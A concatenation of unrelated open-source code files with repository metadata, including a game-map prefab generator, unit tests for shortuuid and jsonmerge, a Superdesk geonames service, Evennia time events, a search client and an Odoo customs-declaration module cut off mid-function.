y122 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 90)[1])
z122 = level*448 + 309
x123 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[0])
y123 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[1])
z123 = level*448 + 309
x124 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[0])
y124 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[1])
z124 = level*448 + 64
x125 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 90)[0])
y125 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 90)[1])
z125 = level*448 + 64
x126 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[0])
y126 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[1])
z126 = level*448 + 64
x127 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[0])
y127 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[1])
z127 = level*448 + 309
x128 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[0])
y128 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[1])
z128 = level*448 + 64
x129 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[0])
y129 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[1])
z129 = level*448 + 64
x130 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[0])
y130 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[1])
z130 = level*448 + 309
x131 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[0])
y131 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[1])
z131 = level*448 + 64
x132 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 90)[0])
y132 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 90)[1])
z132 = level*448 + 64
#INSERT_ROT_3_PY_LIST
var_count = 132
values = "".join(lines)#converting list to string
ogvalues = "".join(lines)
normal_list,axislist,negaxislist,vaxis,uaxis=[],['1 0 0 1','0 1 0 1','0 0 1 1'],['-1 0 0 1','0 -1 0 1','0 0 -1 1'],0,0
def evaluate(coords):
dist_x,dist_y,dist_z = abs(coords[0]),abs(coords[1]),abs(coords[2]),
if dist_x >= dist_y and dist_x >= dist_z:
return axislist[0]
if dist_y >= dist_z:
return axislist[1]
return axislist[2]
def get_normal(coord_list):
vector_a = (coord_list[1][0]-coord_list[0][0],coord_list[1][1]-coord_list[0][1],coord_list[1][2]-coord_list[0][2])
vector_b = (coord_list[2][0]-coord_list[0][0],coord_list[2][1]-coord_list[0][1],coord_list[2][2]-coord_list[0][2])
normal = (vector_a[1]*vector_b[2]-vector_a[2]*vector_b[1],vector_a[2]*vector_b[0]-vector_a[0]*vector_b[2],vector_a[0]*vector_b[1]-vector_a[1]*vector_b[0])
return normal
for normal_num in range(1,var_count+1,3):
normal_list=[]
for i in range(3):
normal_list.append([])
for var in ["x", "y", "z"]:
normal_list[i].append(eval(var+str(normal_num+i)))
coords = get_normal(normal_list)
response = evaluate(coords)
if response == axislist[0]:
uaxis = axislist[1]
else:
uaxis = axislist[0]
if response == axislist[2]:
vaxis = negaxislist[1]
else:
vaxis = negaxislist[2]
values = values.replace('AXIS_REPLACE_U',uaxis,1)
values = values.replace('AXIS_REPLACE_V',vaxis,1)
for i in range(ogvalues.count("world_idnum")):
values = values.replace('world_idnum', str(world_id_num), 1)
world_id_num += 1
for var in ["x", "y", "z"]:
for count in range(1,var_count+1):
string = var + str(count)
string_var = str(eval(var + str(count)))
if var == "z":
values = values.replace(string + ")",string_var + ")") #we need to do this or else it will mess up on 2 digit numbers
else:
values = values.replace(string + " ",string_var + " ")
for i in range(ogvalues.count('id_num')):
values = values.replace('id_num', str(id_num), 1)
id_num = id_num+1
if "ROTATION_RIGHT" in values:
if rotation == 0:
values = values.replace("ROTATION_RIGHT","0 0 0",1)
elif rotation == 1:
values = values.replace("ROTATION_RIGHT","0 270 0",1)
elif rotation == 2:
values = values.replace("ROTATION_RIGHT","0 180 0",1)
elif rotation == 3:
values = values.replace("ROTATION_RIGHT","0 90 0",1)
if "ROTATION_UP" in values:
if rotation == 0:
values = values.replace("ROTATION_UP","0 90 0",1)
elif rotation == 1:
values = values.replace("ROTATION_UP","0 0 0",1)
elif rotation == 2:
values = values.replace("ROTATION_UP","0 270 0",1)
elif rotation == 3:
values = values.replace("ROTATION_UP","0 180 0",1)
if "ROTATION_LEFT" in values:
if rotation == 0:
values = values.replace("ROTATION_LEFT","0 180 0",1)
elif rotation == 1:
values = values.replace("ROTATION_LEFT","0 90 0",1)
elif rotation == 2:
values = values.replace("ROTATION_LEFT","0 0 0",1)
elif rotation == 3:
values = values.replace("ROTATION_LEFT","0 270 0",1)
if "ROTATION_DOWN" in values:
if rotation == 0:
values = values.replace("ROTATION_DOWN","0 270 0",1)
elif rotation == 1:
values = values.replace("ROTATION_DOWN","0 180 0",1)
elif rotation == 2:
values = values.replace("ROTATION_DOWN","0 90 0",1)
elif rotation == 3:
values = values.replace("ROTATION_DOWN","0 0 0",1)
values = values.replace('"[0 0 0 1] 0.25"','"[1 1 1 1] 0.25"')
values = values.replace('"[0 0 1 0] 0.25"','"[1 1 1 1] 0.25"')
values = values.replace('"[0 1 0 0] 0.25"','"[1 1 1 1] 0.25"')
values = values.replace('"[1 0 0 0] 0.25"','"[1 1 1 1] 0.25"')
g = open('prefab_template/diag_wall_egypt_entities.txt', 'r+')
lines_ent = g.readlines()
if rotation == 0:
px1 = posx*1*512 + (256)
py1 = posy*-1*512 + (-40)
pz1 = level*448 + 73
px2 = posx*1*512 + (80)
py2 = posy*-1*512 + (-396)
pz2 = level*448 + 73
px3 = posx*1*512 + (336)
py3 = posy*-1*512 + (-312)
pz3 = level*448 + 72
#INSERT_ROT_0_PY_LIST
elif rotation == 1:
px1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (256), posy*-1*512 + (-40)), 270)[0])
py1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (256), posy*-1*512 + (-40)), 270)[1])
pz1 = level*448 + 73
px2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (80), posy*-1*512 + (-396)), 270)[0])
py2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (80), posy*-1*512 + (-396)), 270)[1])
pz2 = level*448 + 73
px3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (336), posy*-1*512 + (-312)), 270)[0])
py3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (336), posy*-1*512 + (-312)), 270)[1])
pz3 = level*448 + 72
#INSERT_ROT_1_PY_LIST
elif rotation == 2:
px1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (256), posy*-1*512 + (-40)), 180)[0])
py1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (256), posy*-1*512 + (-40)), 180)[1])
pz1 = level*448 + 73
px2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (80), posy*-1*512 + (-396)), 180)[0])
py2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (80), posy*-1*512 + (-396)), 180)[1])
pz2 = level*448 + 73
px3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (336), posy*-1*512 + (-312)), 180)[0])
py3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (336), posy*-1*512 + (-312)), 180)[1])
pz3 = level*448 + 72
#INSERT_ROT_2_PY_LIST
elif rotation == 3:
px1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (256), posy*-1*512 + (-40)), 90)[0])
py1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (256), posy*-1*512 + (-40)), 90)[1])
pz1 = level*448 + 73
px2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (80), posy*-1*512 + (-396)), 90)[0])
py2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (80), posy*-1*512 + (-396)), 90)[1])
pz2 = level*448 + 73
px3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (336), posy*-1*512 + (-312)), 90)[0])
py3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (336), posy*-1*512 + (-312)), 90)[1])
pz3 = level*448 + 72
#INSERT_ROT_3_PY_LIST
ent_var_count = 3
ent_values = "".join(lines_ent)
ent_values_split = ent_values.split("\"")
valcount = "".join(lines_ent)
for item in ent_values_split:
if "entity_name" in item or "parent_name" in item or "door_large" in item:
placeholder_list.append(item)
for i in range(valcount.count('world_idnum')):
ent_values = ent_values.replace('world_idnum', str(world_id_num), 1)
world_id_num += 1
for var in ["px", "py", "pz"]:
for count in range(1,ent_var_count+1):
string = var + str(count)
string_var = str(eval(var + str(count)))
if var == "pz":
ent_values = ent_values.replace(string + "\"",string_var + "\"") #we need to do this or else it will mess up on 2 digit numbers
else:
ent_values = ent_values.replace(string + " ",string_var + " ")
for var in ["x", "y", "z"]:
for count in range(1,var_count+1):
try:
string = var + str(count)
string_var = str(eval(var + str(count)))
if var == "z":
ent_values = ent_values.replace(string + ")",string_var + ")") #we need to do this or else it will mess up on 2 digit numbers
else:
ent_values = ent_values.replace(string + " ",string_var + " ")
except:
pass
for i in range(valcount.count('id_num')):
ent_values = ent_values.replace('id_num', str(id_num), 1)
id_num = id_num+1
for i in range(int(valcount.count('laser_target')/2)):
if "laser_target_plac" in ent_values:
ent_values = ent_values.replace("laser_target_plac", "laser_target" + str(entity_num), 2)
entity_num += 1
for i in range(int(valcount.count('sound'))):
if "sound_plac" in ent_values:
ent_values = ent_values.replace("sound_plac", "AmbSound"+str(entity_num), 2)
ent_values = ent_values.replace("relay_plac", "LogicRelay"+str(entity_num),2)
entity_num += 1
for i in range(valcount.count("entity_name")):
try:
ent_values = ent_values.replace("entity_name", "entity" + str(entity_num), 1)
ent_values = ent_values.replace("entity_same", "entity" + str(entity_num), 1)
if "parent_name" in placeholder_list[entity_num]:
ent_values = ent_values.replace("parent_name", "entity" + str(entity_num), 1)
placeholder_list.remove(placeholder_list[entity_num])
if "door_large" in ent_values:
ent_values = ent_values.replace("door_large", "door_large" + str(entity_num), 4)
if "\"respawn_name\"" in ent_values:
ent_values = ent_values.replace("\"respawn_name\"", "\"respawn_name" + str(entity_num) + "\"", 2)
entity_num += 1
except Exception as e:
print(str(e))
for i in range(valcount.count("ROTATION")):
if "ROTATION_RIGHT" in ent_values:
if rotation == 0:
ent_values = ent_values.replace("ROTATION_RIGHT","0 0 0",1)
elif rotation == 1:
ent_values = ent_values.replace("ROTATION_RIGHT","0 270 0",1)
elif rotation == 2:
ent_values = ent_values.replace("ROTATION_RIGHT","0 180 0 ",1)
elif rotation == 3:
ent_values = ent_values.replace("ROTATION_RIGHT","0 90 0",1)
if "ROTATION_LEFT" in ent_values:
if rotation == 0:
ent_values = ent_values.replace("ROTATION_LEFT","0 180 0",1)
elif rotation == 1:
ent_values = ent_values.replace("ROTATION_LEFT","0 90 0",1)
elif rotation == 2:
ent_values = ent_values.replace("ROTATION_LEFT","0 0 0",1)
elif rotation == 3:
ent_values = ent_values.replace("ROTATION_LEFT","0 270 0",1)
if "ROTATION_DOWN" in ent_values:
if rotation == 0:
ent_values = ent_values.replace("ROTATION_DOWN","0 270 0",1)
elif rotation == 1:
ent_values = ent_values.replace("ROTATION_DOWN","0 180 0",1)
elif rotation == 2:
ent_values = ent_values.replace("ROTATION_DOWN","0 90 0",1)
elif rotation == 3:
ent_values = ent_values.replace("ROTATION_DOWN","0 0 0",1)
if "ROTATION_UP" in ent_values:
if rotation == 0:
ent_values = ent_values.replace("ROTATION_UP","0 90 0",1)
elif rotation == 1:
ent_values = ent_values.replace("ROTATION_UP","0 0 0",1)
elif rotation == 2:
ent_values = ent_values.replace("ROTATION_UP","0 270 0",1)
elif rotation == 3:
ent_values = ent_values.replace("ROTATION_UP","0 180 0",1)
entity_num += 1
return values, id_num, world_id_num, entity_num, ent_values, placeholder_list | gpl-3.0 | -5,276,287,045,558,843,000 | 66.641903 | 162 | 0.534795 | false |
PietroPasotti/MACH | utils/tests/preprocess_unittest.py | 1 | 1094 |
import unittest
from mach.utils import preprocess
example = '/home/pietro/Perceptum/code/mach/mach/utils/twosentences.txt'
shouldbe = {0: {
0: {'tags': set(), 'word': 'The'},
1: {'tags': set(), 'word': 'great'},
2: {'tags': set(), 'word': 'gig'},
3: {'tags': set(), 'word': 'in'},
4: {'tags': set(), 'word': 'the'},
5: {'tags': set(), 'word': 'sky.'}
},
1: {
0: {'tags': set(), 'word': 'The'},
1: {'tags': set(), 'word': 'gods'},
2: {'tags': set(), 'word': 'are'},
3: {'tags': set(), 'word': 'everywhere.'}
}
}
class TestStructure(unittest.TestCase):
def setUp(self):
self.structure = preprocess.Structure(example)
def test_main_structure(self):
self.assertEqual( self.structure.content, shouldbe )
if __name__ == '__main__':
unittest.main()
| agpl-3.0 | 3,418,362,564,199,355,400 | 33.1875 | 76 | 0.40585 | false |
gregorynicholas/shortuuid | shortuuid/tests.py | 1 | 2948 | import os
import sys
import unittest
from uuid import UUID, uuid4
sys.path.insert(0, os.path.abspath(__file__ + "/../.."))
from shortuuid.main import *
class LegacyShortUUIDTest(unittest.TestCase):
def test_generation(self):
self.assertTrue(20 < len(uuid()), 24)
self.assertTrue(20 < len(uuid("http://www.example.com/")) < 24)
self.assertTrue(20 < len(uuid("HTTP://www.example.com/")) < 24)
self.assertTrue(20 < len(uuid("example.com/")) < 24)
def test_encoding(self):
u = UUID('{12345678-1234-5678-1234-567812345678}')
self.assertEquals(encode(u), "VoVuUtBhZ6TvQSAYEqNdF5")
def test_decoding(self):
u = UUID('{12345678-1234-5678-1234-567812345678}')
self.assertEquals(decode("VoVuUtBhZ6TvQSAYEqNdF5"), u)
def test_alphabet(self):
backup_alphabet = get_alphabet()
alphabet = "01"
set_alphabet(alphabet)
self.assertEquals(alphabet, get_alphabet())
set_alphabet("01010101010101")
self.assertEquals(alphabet, get_alphabet())
self.assertEquals(set(uuid()), set("01"))
self.assertTrue(116 < len(uuid()) < 140)
u = uuid4()
self.assertEquals(u, decode(encode(u)))
u = uuid()
self.assertEquals(u, encode(decode(u)))
self.assertRaises(ValueError, set_alphabet, "1")
self.assertRaises(ValueError, set_alphabet, "1111111")
set_alphabet(backup_alphabet)
class ClassShortUUIDTest(unittest.TestCase):
def test_generation(self):
su = ShortUUID()
self.assertTrue(20 < len(su.uuid()) < 24)
self.assertTrue(20 < len(su.uuid("http://www.example.com/")) < 24)
self.assertTrue(20 < len(su.uuid("HTTP://www.example.com/")) < 24)
self.assertTrue(20 < len(su.uuid("example.com/")) < 24)
def test_encoding(self):
su = ShortUUID()
u = UUID('{12345678-1234-5678-1234-567812345678}')
self.assertEquals(su.encode(u), "VoVuUtBhZ6TvQSAYEqNdF5")
def test_decoding(self):
su = ShortUUID()
u = UUID('{12345678-1234-5678-1234-567812345678}')
self.assertEquals(su.decode("VoVuUtBhZ6TvQSAYEqNdF5"), u)
def test_alphabet(self):
alphabet = "01"
su1 = ShortUUID(alphabet)
su2 = ShortUUID()
self.assertEquals(alphabet, su1.get_alphabet())
su1.set_alphabet("01010101010101")
self.assertEquals(alphabet, su1.get_alphabet())
self.assertEquals(set(su1.uuid()), set("01"))
self.assertTrue(116 < len(su1.uuid()) < 140)
self.assertTrue(20 < len(su2.uuid()) < 24)
u = uuid4()
self.assertEquals(u, su1.decode(su1.encode(u)))
u = su1.uuid()
self.assertEquals(u, su1.encode(su1.decode(u)))
self.assertRaises(ValueError, su1.set_alphabet, "1")
self.assertRaises(ValueError, su1.set_alphabet, "1111111")
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | -3,858,694,331,504,901,600 | 30.361702 | 74 | 0.61635 | false |
superdesk/superdesk-core | superdesk/places/places_autocomplete.py | 1 | 2132 | import superdesk
from flask import current_app as app
from superdesk.utils import ListCursor
from superdesk.geonames import geonames_request, format_geoname_item
class PlacesAutocompleteResource(superdesk.Resource):
resource_methods = ["GET"]
item_methods = []
schema = {
"scheme": {"type": "string"},
"code": {"type": "string"},
"name": {"type": "string"},
"state": {"type": "string"},
"region": {"type": "string"},
"country": {"type": "string"},
"state_code": {"type": "string"},
"region_code": {"type": "string"},
"country_code": {"type": "string"},
"continent_code": {"type": "string"},
"feature_class": {"type": "string"},
"location": {
"type": "dict",
"schema": {
"lat": {"type": "float"},
"lon": {"type": "float"},
},
},
"tz": {"type": "string"},
}
class PlacesAutocompleteService(superdesk.Service):
def get(self, req, lookup):
assert req.args.get("name"), {"name": 1}
params = [
("name", req.args.get("name")),
("lang", req.args.get("lang", "en").split("-")[0]),
("style", req.args.get("style", app.config["GEONAMES_SEARCH_STYLE"])),
]
if req.args.get("featureClass"):
params.append(("featureClass", req.args.get("featureClass")))
else:
for feature_class in app.config["GEONAMES_FEATURE_CLASSES"]:
params.append(("featureClass", feature_class.upper()))
json_data = geonames_request("search", params)
data = [format_geoname_item(item) for item in json_data.get("geonames", [])]
return ListCursor(data)
def get_place(self, geoname_id, language="en"):
assert geoname_id
params = [
("geonameId", geoname_id),
("lang", language),
("style", app.config.get("GEONAMES_SEARCH_STYLE", "full")),
]
json_data = geonames_request("getJSON", params)
data = format_geoname_item(json_data)
return data
| agpl-3.0 | -1,543,517,481,427,133,700 | 32.3125 | 84 | 0.532364 | false |
avian2/jsonmerge | tests/test_jsonvalue.py | 1 | 2336 | # vim:ts=4 sw=4 expandtab softtabstop=4
import unittest
from jsonmerge.jsonvalue import JSONValue
class TestJSONValue(unittest.TestCase):
def test_get_attr(self):
v = JSONValue({'a': 'b'})
va = v['a']
self.assertEqual('b', va.val)
self.assertEqual('#/a', va.ref)
def test_get_attr_nonascii(self):
v = JSONValue({u'\u20ac': 'b'})
va = v[u'\u20ac']
self.assertEqual('b', va.val)
self.assertEqual(u'#/\u20ac', va.ref)
def test_get_attr_escape_slash(self):
v = JSONValue({'a/b': 'c'})
va = v['a/b']
self.assertEqual('c', va.val)
self.assertEqual('#/a~1b', va.ref)
def test_get_attr_escape_tilde(self):
v = JSONValue({'~0': 'a'})
va = v['~0']
self.assertEqual('a', va.val)
self.assertEqual('#/~00', va.ref)
def test_get_default(self):
v = JSONValue({})
va = v.get('a')
self.assertTrue(va.is_undef())
def test_get(self):
v = JSONValue({'a': 'b'})
va = v.get('a')
self.assertTrue('b', va.val)
self.assertEqual('#/a', va.ref)
def test_undef(self):
v = JSONValue(undef=True)
self.assertTrue(v.is_undef())
def test_dict_set_attr(self):
v = JSONValue({})
v['a'] = JSONValue('b')
self.assertEqual({'a': 'b'}, v.val)
def test_dict_set_attr_undef(self):
v = JSONValue({})
v['a'] = JSONValue(undef=True)
self.assertEqual({}, v.val)
def test_dict_set_attr_undef_exists(self):
v = JSONValue({'a': 'b'})
v['a'] = JSONValue(undef=True)
self.assertEqual({}, v.val)
def test_list_set_attr(self):
v = JSONValue([1])
v[0] = JSONValue(2)
self.assertEqual([2], v.val)
def test_list_set_attr_undef_exists(self):
v = JSONValue([1])
# Setting a list element to undef does not make sense.
with self.assertRaises(ValueError) as cm:
v[0] = JSONValue(undef=True)
def test_list_set_attr_undef(self):
v = JSONValue([])
with self.assertRaises(ValueError) as cm:
v[0] = JSONValue(undef=True)
def test_append_undef(self):
v = JSONValue([])
v.append(JSONValue(undef=True))
self.assertEqual([], v.val)
| mit | -1,381,239,825,514,151,000 | 22.836735 | 62 | 0.538527 | false |
whitehorse-io/encarnia | Encarnia/world/ingame_time_original.py | 1 | 2199 | # in a file ingame_time.py in mygame/world/
from evennia.utils import gametime
from typeclasses.rooms import Room
# Sunrise!
def at_sunrise():
"""When the sun rises, display a message in every room."""
# Browse all rooms
for room in Room.objects.all():
room.msg_contents("The sun rises from the eastern horizon.")
def start_sunrise_event():
"""Schedule an sunrise event to happen every day at 6 AM."""
script = gametime.schedule(at_sunrise, repeat=True, hour=6, min=0, sec=0)
script.key = "at sunrise"
# noon
def at_noon():
"""Noon message."""
# Browse all rooms
for room in Room.objects.all():
room.msg_contents("The sun sits high and mighty, directly above Encarnia.")
def start_noon_event():
"""Schedule a noon event to happen every day at 6 AM."""
script = gametime.schedule(at_sunrise, repeat=True, hour=12, min=0, sec=0)
script.key = "at noon"
# sunset
def at_sunset():
"""Sunset message."""
# Browse all rooms
for room in Room.objects.all():
room.msg_contents("The sun begins to settle into the horizon, inviting the moon to take its place.")
def start_sunset_event():
"""Schedule sunset."""
script = gametime.schedule(at_sunrise, repeat=True, hour=17, min=0, sec=0)
script.key = "at sunset"
# night
def at_nightstart():
"""nightstart event."""
# Browse all rooms
for room in Room.objects.all():
room.msg_contents("The last of the sun's light has disappeared; it is now night.")
def start_nightstart_event():
"""Schedule nightstart event to happen every day at 6 AM."""
script = gametime.schedule(at_sunrise, repeat=True, hour=20, min=0, sec=0)
script.key = "at nightstart"
#midnight stars
def at_midnight():
"""midnight event message."""
# Browse all rooms
for room in Room.objects.all():
room.msg_contents("Thousands of stars twinkle in the clear midnight sky.")
def start_midnight_event():
"""Schedule a midnight event message to happen every day at 6 AM."""
script = gametime.schedule(at_sunrise, repeat=True, hour=0, min=0, sec=0)
script.key = "at midnight" | mit | 2,210,577,861,242,035,700 | 32.390625 | 108 | 0.650296 | false |
Maxime2/dpsearch-python | searchd-rest.py | 1 | 1255 | #!/usr/bin/python
import json
import urllib
import urllib2
url = 'http://inet-sochi.ru:7003/'
params = {
# The category of the results, 09 - for australian sites
'c' : '09',
# number of results per page, i.e. how many results will be returned
'ps': 10,
# result page number, starting with 0
'np' : 0,
# synonyms use flag, 1 - to use, 0 - don't
'sy' : 0,
# word forms use flag, 1 - to use, 0 - don't (search for words in query exactly)
'sp' : 1,
# search mode, can be 'near', 'all', 'any'
'm' : 'near',
# results groupping by site flag, 'yes' - to group, 'no' - don't
'GroupBySite' : 'no',
# search result template
'tmplt' : 'json2.htm',
# search result ordering, 'I' - importance, 'R' - relevance, 'P' - PopRank, 'D' - date; use lower case letters for descending order
's' : 'IRPD',
# search query, should be URL-escaped
'q' : 'careers'
}
data = urllib.urlencode(params)
full_url = url + '?' + data
result = json.load(urllib2.urlopen(full_url))
rD = result['responseData']
for res in rD['results']:
print res['title']
print ' => ' + res['url']
print
print ' ** Total ' + rD['found'] + ' documents found in ' + rD['time'] + ' sec.'
print ' Displaying documents ' + rD['first'] + '-' + rD['last'] + '.'
| unlicense | 5,561,589,539,934,972,000 | 25.702128 | 131 | 0.610359 | false |
tonygalmiche/is_plastigray | is_deb.py | 1 | 16050 | # -*- coding: utf-8 -*-
from openerp import models,fields,api,SUPERUSER_ID
from openerp.tools.translate import _
from openerp.exceptions import Warning
import datetime
import xmlrpclib
#TODO :
#- DEB importation
#- Ajouter un bouton pour accèder aux lignes de la synthese quand la fiche est terminé
class is_deb(models.Model):
_name='is.deb'
_order='name desc'
def _compute(self):
uid=self._uid
user = self.env['res.users'].browse(uid)
soc=user.company_id.partner_id.is_code
for obj in self:
obj.soc=soc
name = fields.Date("Date DEB" , required=True)
date_debut = fields.Date("Date de début", required=True, help="Date de début des factures")
date_fin = fields.Date("Date de fin" , required=True, help="Date de fin des factures")
soc = fields.Char('Code société', compute='_compute', readonly=True, store=False)
line_ids = fields.One2many('is.deb.line' , 'deb_id', u"Lignes DEB")
synthese_ids = fields.One2many('is.deb.synthese', 'deb_id', u"Synthèse DEB")
state = fields.Selection([('creation', u'Création'),('modification', u'Modification des lignes'),('termine', u'Terminé')], u"État", readonly=True, select=True)
_defaults = {
'name' : lambda *a: fields.datetime.now(),
'state': 'creation',
}
@api.multi
def transfert_action(self):
for obj in self:
obj.line_ids.unlink()
obj.transfert()
obj.state='modification'
return obj.lignes_deb_action()
@api.multi
def transfert(self):
cr , uid, context = self.env.args
for obj in self:
user = self.pool['res.users'].browse(cr, uid, [uid])[0]
company = user.company_id.partner_id
departement = company.zip[:2]
if obj.soc=='3':
departement='70'
SQL="""
select
ai.id,
ai.internal_number,
ai.date_invoice,
ai.type,
ai.is_type_facture,
COALESCE(sp.partner_id, ai.partner_id),
left(pt.is_nomenclature_douaniere,8),
pt.is_origine_produit_id,
sum(fsens(ai.type)*pt.weight_net*ail.quantity),
sum(fsens(ai.type)*ail.price_unit*ail.quantity)
from account_invoice ai inner join account_invoice_line ail on ai.id=ail.invoice_id
inner join product_product pp on ail.product_id=pp.id
inner join product_template pt on pp.product_tmpl_id=pt.id
left outer join stock_move sm on ail.is_move_id=sm.id
left outer join stock_picking sp on sm.picking_id=sp.id
where
ai.date_invoice>='"""+str(obj.date_debut)+"""' and
ai.date_invoice<='"""+str(obj.date_fin)+"""' and
get_property_account_position(COALESCE(sp.partner_id, ai.partner_id))=1 and
pt.is_code not like '608005%' and
ai.state not in ('draft','cancel')
group by
ai.id,
ai.internal_number,
ai.date_invoice,
ai.type,
ai.is_type_facture,
sp.partner_id,
ai.partner_id,
pt.is_nomenclature_douaniere,
pt.is_origine_produit_id
"""
cr.execute(SQL)
result = cr.fetchall()
for row in result:
type_deb='exportation'
type_facture=row[3]
if type_facture=='in_invoice' or type_facture=='in_refund':
type_deb='introduction'
masse_nette=row[8]
if type_deb=='introduction':
masse_nette=0
country=self.env['res.country'].browse(row[7])
pays_origine=''
if type_deb=='introduction':
pays_origine=country.code
partner=self.env['res.partner'].browse(row[5])
pays_destination=partner.country_id.code
vals={
'deb_id' : obj.id,
'type_deb' : type_deb,
'invoice_id' : row[0],
'num_facture' : row[1],
'date_facture' : row[2],
'type_facture' : row[3]+u' '+row[4],
'partner_id' : partner.id,
'nomenclature_douaniere': row[6],
'masse_nette' : masse_nette,
'pays_origine' : pays_origine,
'pays_destination' : pays_destination,
'valeur_fiscale' : row[9],
'departement_expedition': departement,
'num_tva' : partner.vat,
}
line=self.env['is.deb.line'].create(vals)
for line in obj.line_ids:
if line.type_deb=='introduction':
#** Mise à jour de la masse nette sur les lignes ***********
SQL="""
select count(*)
from is_deb_line
where
deb_id="""+str(line.deb_id.id)+""" and
invoice_id="""+str(line.invoice_id.id)+""" and
type_deb='introduction'
"""
nb=0
cr.execute(SQL)
result = cr.fetchall()
for row in result:
nb=row[0]
if nb>0 and line.invoice_id.is_masse_nette>0:
line.masse_nette=line.invoice_id.is_masse_nette/nb
#***********************************************************
#** Mise à jour du port sur les lignes *********************
if nb>0:
SQL="""
select
COALESCE(sum(fsens(ai.type)*ail.price_unit*ail.quantity),0)
from account_invoice ai inner join account_invoice_line ail on ai.id=ail.invoice_id
inner join product_product pp on ail.product_id=pp.id
inner join product_template pt on pp.product_tmpl_id=pt.id
where
ai.id="""+str(line.invoice_id.id)+""" and
pt.is_code like '608005%'
"""
frais_de_port=0
cr.execute(SQL)
result = cr.fetchall()
for row in result:
frais_de_port=row[0]
if nb>0 and frais_de_port!=0:
line.valeur_fiscale=line.valeur_fiscale+frais_de_port/nb
#***********************************************************
@api.multi
def synthese_action(self):
cr , uid, context = self.env.args
for obj in self:
SQL="""
select
type_deb,
num_facture,
date_facture,
code_regime,
nomenclature_douaniere,
pays_origine,
pays_destination,
nature_transaction,
mode_transport,
departement_expedition,
num_tva,
sum(masse_nette),
sum(valeur_fiscale)
from is_deb_line
where deb_id="""+str(obj.id)+"""
group by
type_deb,
num_facture,
date_facture,
code_regime,
nomenclature_douaniere,
pays_origine,
pays_destination,
nature_transaction,
mode_transport,
departement_expedition,
num_tva
"""
cr.execute(SQL)
result = cr.fetchall()
obj.synthese_ids.unlink()
for row in result:
type_deb=row[0]
pays=row[5]
if type_deb=='exportation':
pays=row[6]
vals={
'deb_id' : obj.id,
'type_deb' : type_deb,
'num_facture' : row[1],
'date_facture' : row[2],
'code_regime' : row[3],
'nomenclature_douaniere': row[4],
'pays_destination' : pays,
'nature_transaction' : row[7],
'mode_transport' : row[8],
'departement_expedition': row[9],
'num_tva' : row[10],
'masse_nette' : row[11],
'valeur_fiscale' : row[12],
}
line=self.env['is.deb.synthese'].create(vals)
obj.state='termine'
return self.synthese_lignes_action()
@api.multi
def synthese_multi_sites_action(self):
for obj in self:
obj.synthese_ids.unlink()
databases=self.env['is.database'].search([])
for database in databases:
if database.database:
DB = database.database
USERID = SUPERUSER_ID
DBLOGIN = database.login
USERPASS = database.password
DB_SERVER = database.ip_server
DB_PORT = database.port_server
sock = xmlrpclib.ServerProxy('http://%s:%s/xmlrpc/object' % (DB_SERVER, DB_PORT))
ids = sock.execute(DB, USERID, USERPASS, 'is.deb.synthese', 'search', [
('deb_id.name', '=', obj.name),
], {})
fields=[
'type_deb',
'num_facture',
'date_facture',
'code_regime',
'nomenclature_douaniere',
'masse_nette',
'pays_destination',
'valeur_fiscale',
'nature_transaction',
'mode_transport',
'departement_expedition',
'num_tva',
]
